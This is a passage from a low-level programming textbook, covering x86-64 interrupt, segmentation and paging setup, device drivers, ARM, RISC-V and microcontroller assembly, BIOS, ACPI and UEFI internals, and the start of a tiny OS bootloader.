    shl rdi, 4              ; each entry is 16 bytes
    add rdi, idt_base
    
    mov [rdi], si           ; offset bits 0-15
    mov word [rdi+2], 0x08  ; code segment selector
    mov byte [rdi+4], 0     ; IST index (0 = unused)
    
    ; Set type
    mov [rdi+5], dl         ; 0x8E = present, ring 0, interrupt gate
    
    ; Set high offset
    shr rsi, 16
    mov [rdi+6], si         ; offset bits 16-31
    shr rsi, 16
    mov [rdi+8], esi        ; offset bits 32-63
    mov dword [rdi+12], 0   ; reserved
    
    pop rbp
    ret
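
The 16-byte gate layout can be cross-checked by packing one entry in a scripting language. The sketch below is illustrative (the function name idt_entry is hypothetical); it uses the same field order as a 64-bit interrupt gate: offset low, selector, IST, type, offset middle, offset high, reserved.

```python
import struct


def idt_entry(handler, selector=0x08, ist=0, type_attr=0x8E):
    """Pack one 16-byte long-mode IDT gate descriptor."""
    return struct.pack(
        "<HHBBHII",
        handler & 0xFFFF,                # offset bits 0-15
        selector,                        # code segment selector
        ist & 0x7,                       # interrupt stack table index
        type_attr,                       # present, DPL, gate type
        (handler >> 16) & 0xFFFF,        # offset bits 16-31
        (handler >> 32) & 0xFFFFFFFF,    # offset bits 32-63
        0,                               # reserved
    )


entry = idt_entry(0xFFFFFFFF80123456)
```

Comparing entry.hex() with a memory dump of the IDT in a debugger is a quick way to spot a handler address that was split across the wrong fields.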

Interrupt Handler Template

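; Common interrupt handler stub
; Assumes a per-vector stub pushed an error code (or a dummy 0) and then
; the interrupt number before jumping here
interrupt_handler: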
    ; Save all registers
    push rax
    push rbx
    push rcx
    push rdx
    push rsi
    push rdi
    push rbp
    push r8
    push r9
    push r10
    push r11
    push r12
    push r13
    push r14
    push r15
    
    ; Call C handler
    mov rdi, [rsp+120]   ; interrupt number
    mov rsi, rsp          ; register frame
    call c_handler
    
    ; Restore registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop r11
    pop r10
    pop r9
    pop r8
    pop rbp
    pop rdi
    pop rsi
    pop rdx
    pop rcx
    pop rbx
    pop rax
    
    add rsp, 16          ; discard interrupt number and error code pushed by the stub
    iretq

20.2 Global Descriptor Table

GDT for Long Mode

; Long mode GDT
gdt64:
    dq 0                    ; null descriptor
    dq 0x0020980000000000   ; 64-bit code segment
    dq 0x0000920000000000   ; 64-bit data segment

gdt64_desc:
    dw $ - gdt64 - 1
    dq gdt64

Task State Segment (TSS)

; TSS structure (64-bit, 104 bytes)
struc tss
    .reserved1 resd 1
    .rsp0      resq 1      ; stack for ring 0
    .rsp1      resq 1      ; stack for ring 1
    .rsp2      resq 1      ; stack for ring 2
    .reserved2 resq 1
    .ist1      resq 1      ; interrupt stack table
    .ist2      resq 1
    .ist3      resq 1
    .ist4      resq 1
    .ist5      resq 1
    .ist6      resq 1
    .ist7      resq 1
    .reserved3 resq 1
    .reserved4 resw 1
    .iomap     resw 1      ; I/O map base
endstruc

; Load TSS
load_tss:
    mov ax, 0x28           ; TSS segment selector (GDT index 5; a TSS descriptor must be installed there)
    ltr ax
    ret

20.3 Paging Setup

Identity Mapping

; Identity map first 1GB (one page directory of 2MB pages)
identity_map:
    ; PML4 entry points to PDPT
    mov rax, 0x2000
    or rax, 3              ; present, writable
    mov [0x1000], rax
    
    ; PDPT entry points to PD
    mov rax, 0x3000
    or rax, 3
    mov [0x2000], rax
    
    ; PD entries (512 * 2MB = 1GB)
    mov rdi, 0x3000
    mov rax, 0x83          ; present, writable, huge page
    mov rcx, 512
.map_pd:
    mov [rdi], rax
    add rax, 0x200000      ; next 2MB
    add rdi, 8
    loop .map_pd
    ret

Page Fault Handler

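page_fault_handler:
    ; Save registers used here (a real handler saves every caller-saved
    ; register, since alloc_page and map_page may clobber them)
    push rax
    push rbx
    push rdi
    push rsi
    
    ; Get faulting address from CR2, rounded down to a page boundary
    mov rbx, cr2
    and rbx, -4096
    
    ; (simplified - no validity check, just allocate a page)
    call alloc_page       ; returns physical page address in RAX
    
    ; Map page at faulting address
    mov rdi, rbx          ; virtual address
    mov rsi, rax          ; physical address
    call map_page
    
    pop rsi
    pop rdi
    pop rbx
    pop rax
    add rsp, 8            ; discard the error code pushed by the CPU
    
    ; Return from fault (instruction will be retried)
    iretq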

20.4 Task Switching

Software Task Switching

; Save current task context
save_context:
    ; Save registers to TSS or task structure
    mov [task_struct + Task.rax], rax
    mov [task_struct + Task.rbx], rbx
    ; ... save others
    
    ; Save stack pointer
    mov [task_struct + Task.rsp], rsp
    
    ; Save instruction pointer from return address
    mov rax, [rsp]
    mov [task_struct + Task.rip], rax
    ret

; Switch to next task
switch_task:
    ; Save current
    call save_context
    
    ; Select next task (simplified round-robin)
    mov rax, [current_task]
    inc rax
    cmp rax, [task_count]
    jl .set_current
    xor rax, rax
.set_current:
    mov [current_task], rax
    
    ; Load new task
    mov rbx, [task_list + rax*8]
    
    ; Restore stack
    mov rsp, [rbx + Task.rsp]
    
    ; Restore other registers
    mov rax, [rbx + Task.rax]
    mov rbx, [rbx + Task.rbx]
    ; ... restore others
    
    ; Jump to saved instruction pointer
    ret

20.5 Writing Device Drivers

PCI Configuration

; Read PCI config space
; EDI = (bus << 16) | (device << 11) | (function << 8)
; ESI = register offset (multiple of 4)
pci_read_config:
    mov eax, 0x80000000
    or eax, edi          ; bus:device:function
    or eax, esi          ; offset
    mov dx, 0xCF8
    out dx, eax
    
    mov dx, 0xCFC
    in eax, dx
    ret

; Write PCI config space
pci_write_config:
    push rax
    mov eax, 0x80000000
    or eax, edi
    or eax, esi
    mov dx, 0xCF8
    out dx, eax
    
    pop rax
    mov dx, 0xCFC
    out dx, eax
    ret
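
The value written to port 0xCF8 packs several fields into one dword. The sketch below is illustrative (the function name pci_config_address is hypothetical); it shows how bus, device, function, and register offset combine with the enable bit.

```python
def pci_config_address(bus, device, function, offset):
    """Build the CONFIG_ADDRESS value for PCI configuration mechanism #1."""
    if not (0 <= bus < 256 and 0 <= device < 32
            and 0 <= function < 8 and 0 <= offset < 256):
        raise ValueError("field out of range")
    return (0x80000000            # enable bit
            | (bus << 16)         # bits 16-23
            | (device << 11)      # bits 11-15
            | (function << 8)     # bits 8-10
            | (offset & 0xFC))    # bits 2-7, dword-aligned register


vendor_device_reg = pci_config_address(0, 31, 3, 0x00)
```

Offset 0x00 of every function holds the vendor and device IDs, so scanning all bus/device/function combinations for a vendor ID other than 0xFFFF is the usual way to enumerate devices.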

Simple UART Driver

; COM1 base address
COM1 equ 0x3F8

; Initialize UART
uart_init:
    ; Set baud rate divisor
    mov dx, COM1 + 3      ; line control register
    mov al, 0x80          ; enable DLAB
    out dx, al
    
    mov dx, COM1          ; divisor low
    mov al, 1             ; 115200 baud
    out dx, al
    
    mov dx, COM1 + 1      ; divisor high
    xor al, al
    out dx, al
    
    ; Set line parameters
    mov dx, COM1 + 3
    mov al, 3             ; 8 bits, no parity, 1 stop
    out dx, al
    
    ; Enable FIFO
    mov dx, COM1 + 2
    mov al, 0xC7
    out dx, al
    ret

; Send character
uart_putc:
    push rax
    mov dx, COM1 + 5      ; line status
.wait:
    in al, dx
    test al, 0x20         ; transmitter holding register empty?
    jz .wait
    
    pop rax
    mov dx, COM1
    out dx, al
    ret
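
The divisor written in uart_init follows from the UART clock. The sketch below is illustrative: the function name uart_divisor is hypothetical, and it assumes the standard PC UART clock of 1.8432 MHz, which gives a maximum rate of 115200 baud.

```python
UART_CLOCK_HZ = 1_843_200   # assumed standard PC UART input clock


def uart_divisor(baud):
    """Return (low_byte, high_byte) of the divisor latch for a baud rate."""
    max_baud = UART_CLOCK_HZ // 16          # 115200
    if baud <= 0 or max_baud % baud != 0:
        raise ValueError("baud rate must divide 115200 evenly")
    divisor = max_baud // baud
    if divisor > 0xFFFF:
        raise ValueError("divisor does not fit in 16 bits")
    return divisor & 0xFF, (divisor >> 8) & 0xFF


fastest = uart_divisor(115200)   # the value used in uart_init
common = uart_divisor(9600)
```

The low byte goes to COM1 + 0 and the high byte to COM1 + 1 while DLAB is set, exactly as in the assembly above.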

PART VIII — Advanced Architectures

Chapter 21: ARM Assembly

21.1 ARM vs x86

Key Differences

Feature	ARM	x86
Instruction set	RISC	CISC
Registers	16 (AArch32) or 31 (AArch64) general purpose	8 (x86) or 16 (x86-64) general purpose
Instruction length	Fixed 32-bit (16/32-bit mix in Thumb)	Variable
Addressing	Load-store	Memory operands
Conditionals	Conditional execution (AArch32)	Conditional jumps
Endianness	Bi-endian	Little-endian

21.2 ARM Registers

ARM32 (AArch32)

R0-R3:   Argument/scratch registers
R4-R11:  Callee-saved registers
R12:     IP (intra-procedure scratch)
R13:     SP (stack pointer)
R14:     LR (link register)
R15:     PC (program counter)

CPSR:    Current Program Status Register
    N: Negative flag
    Z: Zero flag
    C: Carry flag
    V: Overflow flag
    I: IRQ disable
    F: FIQ disable
    T: Thumb state
    M: Mode bits

ARM64 (AArch64)

X0-X7:   Argument/result registers
X8:      Indirect result location register
X9-X15:  Temporary registers
X16-X17: Intra-procedure scratch
X18:     Platform register
X19-X28: Callee-saved
X29:     FP (frame pointer)
X30:     LR (link register)
SP:      Stack pointer
PC:      Program counter

NZCV:    Condition flags (in PSTATE)

21.3 ARM Instruction Set

Data Processing Instructions

; Arithmetic
ADD R0, R1, R2      ; R0 = R1 + R2
SUB R0, R1, R2      ; R0 = R1 - R2
RSB R0, R1, R2      ; R0 = R2 - R1 (reverse subtract)

; Logical
AND R0, R1, R2      ; R0 = R1 & R2
ORR R0, R1, R2      ; R0 = R1 | R2
EOR R0, R1, R2      ; R0 = R1 ^ R2
BIC R0, R1, R2      ; R0 = R1 & ~R2

; Move
MOV R0, #42         ; R0 = 42
MVN R0, R1          ; R0 = ~R1

; Compare (set flags only)
CMP R0, R1          ; set flags based on R0 - R1
CMN R0, R1          ; set flags based on R0 + R1
TST R0, R1          ; set flags based on R0 & R1
TEQ R0, R1          ; set flags based on R0 ^ R1

Load/Store Instructions

; Single register
LDR R0, [R1]        ; R0 = *R1
STR R0, [R1]        ; *R1 = R0

; With offset
LDR R0, [R1, #4]    ; R0 = *(R1 + 4)
LDR R0, [R1, R2]    ; R0 = *(R1 + R2)
LDR R0, [R1, R2, LSL #2] ; R0 = *(R1 + (R2<<2))

; Pre-indexed
LDR R0, [R1, #4]!   ; R1 += 4, then R0 = *R1

; Post-indexed
LDR R0, [R1], #4    ; R0 = *R1, then R1 += 4

; Multiple registers
LDMIA R0!, {R1-R4}  ; Load multiple, increment after
STMDB R0!, {R1-R4}  ; Store multiple, decrement before

Branch Instructions

B label             ; unconditional branch
BL label            ; branch and link (call)
BX R0               ; branch and exchange to register
BLX R0              ; branch with link and exchange

; Conditional branches
BEQ label           ; branch if equal (Z=1)
BNE label           ; branch if not equal (Z=0)
BGT label           ; branch if greater than (signed)
BLT label           ; branch if less than (signed)

21.4 Thumb Mode

16-bit compressed instruction set.

Thumb vs ARM

; ARM mode (32-bit)
ADD R0, R1, R2      ; 4 bytes

; Thumb mode (16-bit)
ADD R0, R1          ; R0 += R1 (2 bytes)

Thumb-2

Mixed 16/32-bit instructions:

IT EQ               ; If-Then: makes the next instruction conditional (ITxyz forms cover up to 4)
ADDEQ R0, R1        ; executed only if EQ
ADD R2, R3          ; not part of IT block

21.5 ARM64

AArch64 Instructions

; Data processing
ADD X0, X1, X2      ; X0 = X1 + X2
SUB X0, X1, X2      ; X0 = X1 - X2
AND X0, X1, X2      ; X0 = X1 & X2

; Load/store
LDR X0, [X1]        ; X0 = *X1
STR X0, [X1]        ; *X1 = X0
LDP X0, X1, [X2]    ; load pair

; Branches
B label             ; unconditional
BL label            ; branch with link
RET                 ; return from function

Function Call Example

; int add(int a, int b) { return a + b; }
add:
    ADD W0, W0, W1   ; W0 = W0 + W1 (32-bit)
    RET

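; int main() { return add(5, 3); }
main:
    STP X29, X30, [SP, #-16]!  ; save FP and LR (BL overwrites LR)
    MOV W0, #5       ; first argument
    MOV W1, #3       ; second argument
    BL add           ; call add
    LDP X29, X30, [SP], #16    ; restore FP and LR
    RET              ; return (result in W0)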

Chapter 22: RISC-V Assembly

22.1 RISC-V Architecture

Design Philosophy

Clean-slate design
Open ISA
Modular extensions
Suitable for all implementations

Base Integer ISA (RV32I/RV64I)

32-bit (RV32I) or 64-bit (RV64I)
32 registers (x0-x31)
Simple load-store architecture
Few instruction formats

22.2 Instruction Formats

R-Type (Register-Register)

funct7 | rs2 | rs1 | funct3 | rd | opcode
 7 bits |5 bits|5 bits|3 bits|5 bits|7 bits

Example: ADD x1, x2, x3

I-Type (Immediate)

immediate[11:0] | rs1 | funct3 | rd | opcode
   12 bits      |5 bits|3 bits|5 bits|7 bits

Example: ADDI x1, x2, 100

S-Type (Store)

imm[11:5] | rs2 | rs1 | funct3 | imm[4:0] | opcode
  7 bits  |5 bits|5 bits|3 bits| 5 bits   |7 bits

Example: SW x1, 100(x2)

B-Type (Branch)

imm[12,10:5] | rs2 | rs1 | funct3 | imm[4:1,11] | opcode
    7 bits   |5 bits|5 bits|3 bits|   5 bits    |7 bits

Example: BEQ x1, x2, label

U-Type (Upper Immediate)

immediate[31:12] | rd | opcode
    20 bits      |5 bits|7 bits

Example: LUI x1, 0x12345

J-Type (Jump)

immediate[20,10:1,11,19:12] | rd | opcode
         20 bits            |5 bits|7 bits

Example: JAL x1, label
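
The field layouts above can be turned into small encoders. The sketch below is illustrative (the function names encode_r, encode_i, and encode_s are hypothetical); the opcode and funct values for ADD, ADDI, and SW are the ones defined by the base integer ISA.

```python
def encode_r(funct7, rs2, rs1, funct3, rd, opcode):
    """Encode an R-type instruction."""
    return (funct7 << 25) | (rs2 << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode


def encode_i(imm, rs1, funct3, rd, opcode):
    """Encode an I-type instruction; imm is a signed 12-bit value."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode


def encode_s(imm, rs2, rs1, funct3, opcode):
    """Encode an S-type instruction; the immediate is split into two fields."""
    imm &= 0xFFF
    return ((imm >> 5) << 25) | (rs2 << 20) | (rs1 << 15) | (funct3 << 12) | ((imm & 0x1F) << 7) | opcode


add_x1_x2_x3 = encode_r(0b0000000, 3, 2, 0b000, 1, 0b0110011)   # ADD x1, x2, x3
addi_x1_x2_100 = encode_i(100, 2, 0b000, 1, 0b0010011)          # ADDI x1, x2, 100
sw_x1_100_x2 = encode_s(100, 1, 2, 0b010, 0b0100011)            # SW x1, 100(x2)
```

The results can be compared against the output of an assembler and objdump to confirm the bit positions.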

22.3 CSR Registers

Control and Status Registers.

Common CSRs

mstatus: Machine status
mtvec:   Machine trap handler base
mepc:    Machine exception PC
mcause:  Machine exception cause
mtval:   Machine trap value
mip:     Machine interrupt pending
mie:     Machine interrupt enable

CSR Instructions

CSRRW rd, csr, rs1   ; atomic read/write
CSRRS rd, csr, rs1   ; atomic read/set bits
CSRRC rd, csr, rs1   ; atomic read/clear bits
CSRRWI rd, csr, imm  ; read/write immediate
CSRRSI rd, csr, imm  ; read/set immediate
CSRRCI rd, csr, imm  ; read/clear immediate

22.4 Embedded RISC-V

RV32E for Embedded

16 registers (x0-x15)
Reduced area
Same ISA otherwise

Example: Blink LED

# GPIO base address
.equ GPIO_BASE, 0x10012000
.equ GPIO_OUT, 0x00
.equ GPIO_DIR, 0x04

.section .text
.globl _start

_start:
    # Set up stack
    la sp, _stack_top
    
    # Configure GPIO
    li t0, GPIO_BASE
    
    # Set pin 5 as output
    li t1, (1 << 5)
    sw t1, GPIO_DIR(t0)
    
loop:
    # Turn LED on
    sw t1, GPIO_OUT(t0)
    
    # Delay
    li a0, 100000
    call delay
    
    # Turn LED off
    sw zero, GPIO_OUT(t0)
    
    # Delay
    li a0, 100000
    call delay
    
    j loop

delay:
    li t2, 0            # use t2: t0 still holds GPIO_BASE
1:
    addi t2, t2, 1
    blt t2, a0, 1b
    ret

PART IX — Embedded Systems & Hardware Programming

Chapter 23: Microcontrollers

23.1 AVR Assembly

AVR Architecture

8-bit RISC
32 8-bit registers (R0-R31)
Some registers have special functions:
- R26-R27: X pointer
- R28-R29: Y pointer
- R30-R31: Z pointer

Basic Instructions

; Data transfer
LDI R16, 0xFF       ; load immediate
MOV R0, R1          ; copy register
LD R0, X            ; load indirect
ST X, R0            ; store indirect

; Arithmetic
ADD R0, R1          ; add
SUB R0, R1          ; subtract
INC R0              ; increment
DEC R0              ; decrement

; Logic
AND R0, R1          ; and
OR R0, R1           ; or
EOR R0, R1          ; xor
COM R0              ; complement

; Branch
RJMP label          ; relative jump
RCALL label         ; relative call
RET                 ; return
BRNE label          ; branch if not equal

Example: Blink LED

; ATmega328P (Arduino Uno)

.equ DDRB, 0x04
.equ PORTB, 0x05

.org 0
    rjmp main

main:
    ; Set pin 5 as output
    ldi r16, (1 << 5)
    out DDRB, r16
    
loop:
    ; Turn LED on
    sbi PORTB, 5
    
    ; Delay
    ldi r18, 100
    call delay
    
    ; Turn LED off
    cbi PORTB, 5
    
    ; Delay
    ldi r18, 100
    call delay
    
    rjmp loop

delay:
    ldi r16, 255
1:  ldi r17, 255
2:  dec r17
    brne 2b
    dec r16
    brne 1b
    dec r18
    brne delay
    ret

23.2 STM32

ARM Cortex-M microcontrollers.

STM32F4 Example

@ STM32F4 Discovery - Blink LED
@ (GNU as for ARM uses @ for comments; vector table and startup code omitted)
.syntax unified
.cpu cortex-m4
.thumb

.equ RCC_AHB1ENR, 0x40023830
.equ GPIOD_MODER, 0x40020C00
.equ GPIOD_ODR,   0x40020C14

.section .text
.global _start

_start:
    @ Enable GPIOD clock
    ldr r0, =RCC_AHB1ENR
    ldr r1, [r0]
    orr r1, r1, #(1 << 3)  @ bit 3 for GPIOD
    str r1, [r0]
    
    @ Configure PD12 as output
    ldr r0, =GPIOD_MODER
    ldr r1, [r0]
    bic r1, r1, #(3 << 24) @ clear bits 24-25 (PD12)
    orr r1, r1, #(1 << 24) @ set to output (01)
    str r1, [r0]
    
loop:
    @ LED on
    ldr r0, =GPIOD_ODR
    ldr r1, [r0]
    orr r1, r1, #(1 << 12) @ set PD12 high
    str r1, [r0]
    
    @ Delay
    ldr r2, =1000000
1:  subs r2, r2, #1
    bne 1b
    
    @ LED off
    ldr r0, =GPIOD_ODR
    ldr r1, [r0]
    bic r1, r1, #(1 << 12) @ set PD12 low
    str r1, [r0]
    
    @ Delay
    ldr r2, =1000000
2:  subs r2, r2, #1
    bne 2b
    
    b loop

.section .stack
.space 1024
_stack_top:

23.3 Memory-Mapped I/O

Peripherals controlled via memory addresses.

GPIO Registers

; Typical GPIO register layout
struc gpio_regs
    .moder   resd 1   ; mode register
    .otyper  resd 1   ; output type
    .ospeedr resd 1   ; output speed
    .pupdr   resd 1   ; pull-up/down
    .idr     resd 1   ; input data
    .odr     resd 1   ; output data
    .bsrr    resd 1   ; bit set/reset
    .lckr    resd 1   ; lock
    .afrl    resd 1   ; alternate function low
    .afrh    resd 1   ; alternate function high
endstruc

; Set pin as output
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))  ; clear mode bits
or eax, (1 << (pin*2))    ; set to output
mov [gpio_base + gpio_regs.moder], eax

; Write to pin (pin is an assemble-time constant)
mov eax, 1 << pin
mov [gpio_base + gpio_regs.bsrr], eax  ; bits 0-15 set the pin
shl eax, 16
mov [gpio_base + gpio_regs.bsrr], eax  ; bits 16-31 reset the pin
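
The mask arithmetic in the read-modify-write sequence is worth checking on paper or in a script before committing it to hardware. The sketch below is illustrative (the function names set_pin_mode, bsrr_set, and bsrr_reset are hypothetical) and models the registers as plain 32-bit integers.

```python
def set_pin_mode(moder, pin, mode):
    """Return the MODER value with the 2-bit mode field of one pin replaced."""
    shift = pin * 2
    cleared = moder & ~(0b11 << shift)                 # clear the pin's mode bits
    return (cleared | ((mode & 0b11) << shift)) & 0xFFFFFFFF


def bsrr_set(pin):
    """BSRR value that drives a pin high (bits 0-15)."""
    return 1 << pin


def bsrr_reset(pin):
    """BSRR value that drives a pin low (bits 16-31)."""
    return 1 << (pin + 16)


pd12_output = set_pin_mode(0xFFFFFFFF, 12, 0b01)   # only bits 24-25 change
```

Because BSRR writes affect only the pins whose bits are 1, setting or clearing a pin through it needs no read-modify-write, unlike ODR.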

23.4 GPIO Programming

Input Configuration

; Configure pin as input with pull-up
; Clear mode bits (00 = input)
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))
mov [gpio_base + gpio_regs.moder], eax

; Configure pull-up
mov eax, [gpio_base + gpio_regs.pupdr]
and eax, ~(3 << (pin*2))
or eax, (1 << (pin*2))     ; 01 = pull-up
mov [gpio_base + gpio_regs.pupdr], eax

; Read input
mov eax, [gpio_base + gpio_regs.idr]
shr eax, pin
and eax, 1                  ; get pin value

Interrupt on Pin Change

; Enable EXTI interrupt on pin
; Configure SYSCFG to route GPIO to EXTI
mov eax, [SYSCFG_EXTICR + (pin/4)*4]
and eax, ~(0xF << ((pin%4)*4))
or eax, (port << ((pin%4)*4))
mov [SYSCFG_EXTICR + (pin/4)*4], eax

; Configure EXTI (read-modify-write so other lines keep their settings)
mov eax, 1 << pin
or [EXTI_IMR], eax          ; unmask interrupt
or [EXTI_RTSR], eax         ; rising edge trigger

; Set interrupt priority
mov byte [NVIC_IPR(EXTI_IRQn)], 0

; Enable interrupt in NVIC
mov eax, 1 << EXTI_IRQn
mov [NVIC_ISER], eax

23.5 Interrupt Controllers

NVIC (Nested Vectored Interrupt Controller)

; Set interrupt priority
; NVIC_IPR holds one 8-bit priority field per interrupt (byte n = IRQ n);
; many Cortex-M parts implement only the upper 4 bits of each field
mov r0, #EXTI0_IRQn  ; byte offset = IRQ number
mov r2, #0x80        ; priority (128)
ldr r3, =NVIC_IPR_BASE
strb r2, [r3, r0]    ; byte store (ARMv7-M) leaves neighbouring priorities untouched

; Enable interrupt
mov r0, #EXTI0_IRQn
lsr r1, r0, #5       ; which ISER register
and r0, r0, #0x1F    ; bit in register (IRQ number mod 32)
mov r2, #1
lsl r2, r2, r0
ldr r3, =NVIC_ISER_BASE
str r2, [r3, r1, lsl #2]
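
The index arithmetic in the NVIC code can be checked on a host machine before it is committed to assembly. The following C sketch computes the ISER word, the bit within it, and the IPR byte offset for an interrupt number; nvic_slot_t and nvic_slot are hypothetical names used only for this illustration.

```c
#include <stdint.h>

typedef struct {
    uint32_t iser_index;  /* which 32-bit ISER word holds the enable bit */
    uint32_t iser_mask;   /* bit to write within that word */
    uint32_t ipr_offset;  /* byte offset of the priority field from the IPR base */
} nvic_slot_t;

static nvic_slot_t nvic_slot(uint32_t irqn) {
    nvic_slot_t s;
    s.iser_index = irqn >> 5;            /* 32 interrupts per ISER word */
    s.iser_mask  = 1u << (irqn & 0x1F);  /* position inside the word */
    s.ipr_offset = irqn;                 /* one priority byte per interrupt */
    return s;
}
```

For interrupt 40, for example, this yields ISER word 1, bit 8, and priority byte 40.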

Interrupt Handler

; EXTI0 interrupt handler
EXTI0_IRQHandler:
    push {r0-r3, lr}
    
    ; Check if EXTI0 triggered
    ldr r0, =EXTI_PR
    ldr r1, [r0]
    tst r1, #1
    beq .done
    
    ; Clear pending bit (write 1 to bit 0 only so other lines stay pending)
    mov r1, #1
    str r1, [r0]
    
    ; Handle interrupt
    bl handle_button_press
    
.done:
    pop {r0-r3, pc}

Chapter 24: BIOS & Firmware

24.1 CMOS

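CMOS memory is a small battery-backed RAM, shared with the real-time clock, that stores system configuration. It is accessed through I/O port 0x70 (register index) and port 0x71 (data).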

CMOS Access

; Read CMOS register
; AL = register number
read_cmos:
    out 0x70, al      ; select register
    in al, 0x71       ; read data
    ret

; Write CMOS register
; AL = register number, AH = data
write_cmos:
    out 0x70, al
    mov al, ah
    out 0x71, al
    ret

Common CMOS Registers

0x00: Seconds
0x02: Minutes
0x04: Hours
0x07: Day of month
0x08: Month
0x09: Year
0x0A: Status register A
0x0B: Status register B
0x0C: Status register C
0x0D: Status register D
0x10: Floppy drive type
0x12: Hard disk type
0x14: Equipment list
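
The time and date registers usually hold packed BCD rather than binary values; bit 2 of status register B selects binary mode when set. A minimal decoding sketch in C follows, with bcd_to_bin and rtc_decode as illustrative helper names:

```c
#include <stdint.h>

/* Convert one packed-BCD byte (e.g. 0x59) to binary (59). */
static uint8_t bcd_to_bin(uint8_t bcd) {
    return (uint8_t)((bcd >> 4) * 10 + (bcd & 0x0F));
}

/* Decode a raw RTC register value using status register B:
   bit 2 set means the value is already binary. */
static uint8_t rtc_decode(uint8_t raw, uint8_t status_b) {
    return (status_b & 0x04) ? raw : bcd_to_bin(raw);
}
```

A caller would read register 0x0B once, then pass each value returned by read_cmos through rtc_decode.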

24.2 ACPI

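ACPI (Advanced Configuration and Power Interface) describes hardware and power-management capabilities to the operating system through tables that the firmware places in memory.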

ACPI Tables

RSDP (Root System Description Pointer)
  - Signature "RSD PTR "
  - Checksum
  - OEM ID
  - RSDT address

RSDT (Root System Description Table)
  - Pointers to other tables
  - FADT, MADT, SSDT, etc.

FADT (Fixed ACPI Description Table)
  - Power management info
  - DSDT address
  - SCI interrupt

Finding ACPI Tables

; Search for RSDP in BIOS memory
find_rsdp:
    mov esi, 0xE0000   ; start of BIOS area
.search_loop:
    cmp dword [esi], 'RSD '  ; "RSD "
    jne .next
    cmp dword [esi+4], 'PTR ' ; "PTR "
    je .found
.next:
    add esi, 16
    cmp esi, 0x100000
    jb .search_loop          ; unsigned compare for addresses
    xor eax, eax        ; not found
    ret
.found:
    mov eax, esi
    ret
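
A signature match alone can be a false positive, which is why the RSDP carries a checksum: the first 20 bytes of the structure must sum to zero modulo 256. The C sketch below validates a candidate found by the search; rsdp_is_valid is an illustrative name, and only the ACPI 1.0 portion of the structure is checked.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RSDP_V1_LENGTH 20  /* size of the ACPI 1.0 RSDP in bytes */

/* Returns 1 if `p` points at a plausible RSDP, 0 otherwise. */
static int rsdp_is_valid(const uint8_t *p) {
    if (memcmp(p, "RSD PTR ", 8) != 0)
        return 0;                       /* wrong signature */
    uint8_t sum = 0;
    for (size_t i = 0; i < RSDP_V1_LENGTH; i++)
        sum = (uint8_t)(sum + p[i]);    /* byte-wise sum, wraps at 256 */
    return sum == 0;
}
```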

24.3 UEFI Internals

UEFI Runtime Services

// Get variable
EFI_STATUS GetVariable(
    CHAR16 *VariableName,
    EFI_GUID *VendorGuid,
    UINT32 *Attributes,
    UINTN *DataSize,
    VOID *Data
);

// Set variable
EFI_STATUS SetVariable(
    CHAR16 *VariableName,
    EFI_GUID *VendorGuid,
    UINT32 Attributes,
    UINTN DataSize,
    VOID *Data
);

// Get time
EFI_STATUS GetTime(
    EFI_TIME *Time,
    EFI_TIME_CAPABILITIES *Capabilities
);

UEFI Protocols

// Simple File System Protocol
struct EFI_SIMPLE_FILE_SYSTEM_PROTOCOL {
    UINT64 Revision;
    EFI_OPEN_VOLUME OpenVolume;
};

// Get file system handle
EFI_SIMPLE_FILE_SYSTEM_PROTOCOL *FileSystem;
status = BS->HandleProtocol(
    DeviceHandle,
    &gEfiSimpleFileSystemProtocolGuid,
    (VOID**)&FileSystem
);

// Open volume
EFI_FILE_PROTOCOL *Root;
status = FileSystem->OpenVolume(FileSystem, &Root);

24.4 Firmware Reverse Engineering

Extracting Firmware

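# Dump BIOS from Linux (internal programmer, requires root)
flashrom -p internal -r bios.bin

# UEFI variables (not the firmware image) are exposed under
# /sys/firmware/efi/efivars/; the firmware image itself has to
# be read from the flash chip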

Analyzing Firmware

# Check strings
strings bios.bin | grep -i "copyright\|version\|model"

# Check entropy
binwalk -E bios.bin

# Extract components
binwalk -e bios.bin

Common Firmware Structures

UEFI Firmware Volume:
  - Volume header
  - File system
  - FFS files (PE/COFF images)

BIOS:
  - POST code
  - Runtime services
  - ACPI tables
  - VGA BIOS option ROMs

Finding Entry Points

; Look for BIOS entry point
; Usually at F000:FFF0 (reset vector)
; Contains far jump to POST code

; UEFI SEC/PEI phase entry
; Look for specific GUIDs in firmware volume
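
Firmware volumes can be located in a raw dump by their header signature: the volume header stores the ASCII tag "_FVH" at byte offset 40, after a 16-byte zero vector, the 16-byte file system GUID and the 8-byte volume length. The scan below is a sketch under that layout; find_fv_header is a hypothetical helper, and a hit is only a candidate until the header checksum and length have been verified.

```c
#include <stddef.h>
#include <string.h>

#define FV_SIGNATURE_OFFSET 40  /* ZeroVector[16] + FileSystemGuid[16] + FvLength (8) */

/* Returns the offset of the first candidate volume header at or after
   `start`, or (size_t)-1 if no signature is found. */
static size_t find_fv_header(const unsigned char *img, size_t len, size_t start) {
    for (size_t sig = start + FV_SIGNATURE_OFFSET; sig + 4 <= len; sig++) {
        if (memcmp(img + sig, "_FVH", 4) == 0)
            return sig - FV_SIGNATURE_OFFSET;   /* header begins 40 bytes earlier */
    }
    return (size_t)-1;
}
```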

PART X — Practical Projects

Chapter 25: Building a Tiny OS

Bootloader

Stage 1 Bootloader

; boot1.asm - First stage bootloader
[org 0x7C00]
[bits 16]

start:
    ; Set up segments
    xor ax, ax
    mov ds, ax
    mov es, ax
    mov ss, ax
    mov sp, 0x7C00
    
    ; Save boot drive
    mov [boot_drive], dl
    
    ; Print message
    mov si, msg_boot1
    call print_string
    
    ; Load second stage
    mov si, msg_loading
    call print_string
    
    mov ah, 0x02        ; read sectors
    mov al, 0x20        ; sectors to read
    mov ch, 0           ; cylinder
    mov cl, 2           ; sector
    mov dh, 0           ; head
    mov dl, [boot_drive]
    mov bx, 0x1000      ; buffer segment
    mov es, bx
    xor bx, bx
    int 0x13
    
    jc disk_error
    
    ; Jump to second stage
    jmp 0x1000:0x0000

disk_error:
    mov si, msg_error
    call print_string
    jmp $

print_string:
    lodsb
    or al, al
    jz .done
    mov ah, 0x0E
    int 0x10
    jmp print_string
.done:
    ret

boot_drive db 0
msg_boot1 db "TinyOS Bootloader Stage 1", 13, 10, 0
